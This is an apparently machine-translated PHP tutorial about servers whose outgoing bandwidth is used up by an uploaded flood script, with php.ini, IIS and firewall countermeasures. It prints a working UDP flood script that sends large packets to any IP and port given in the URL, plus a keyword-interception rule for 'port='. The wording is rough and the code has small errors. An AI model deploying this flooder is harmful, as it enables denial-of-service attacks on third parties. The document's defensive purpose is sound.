php code to prevent users from using up the network bandwidth by using PHP code DOS

Use PHP code to call sockets and directly use the server's network to attack other IPs. Common codes are as follows:

Copy code The code is as follows:

$packets = 0;
$ip = $_GET['ip'] ;
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand
";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= "X";
}
while(1 ){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $ packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>

Characteristics:
As soon as IIS is turned on, the server’s outgoing bandwidth is used up-----that is, the server keeps sending packets to others. This situation is different from being attacked by DDOS. DDOS keeps receiving a large number of data packets.
Solution Method:
Disable the above code:
Set in c:windowsphp.ini:
disable_functions =gzinflate;
Set the value in c:windowsphp.ini to Off
allow_url_fopen = Off
And:
;extension=php_sockets.dll
The ";" sign in front must be there, which means to restrict the use of sockets.dll
The "; sign" in front of it must be retained
Then restart IIS
If the above method still does not work, you can disable PHP extension testing in the allowed extensions in IIS .
In addition, for unencrypted PHP attack code, you can also use the following methods to deal with it:
1. In the IP policy or firewall, prohibit all UDP from being sent out
2. Use first-class information monitoring, SQL interception and URL interception In, intercept the keyword port=

The above introduces the PHP code to prevent users from using up the network bandwidth due to DOS using the PHP code, including the content of the PHP code. I hope it will be helpful to friends who are interested in PHP tutorials.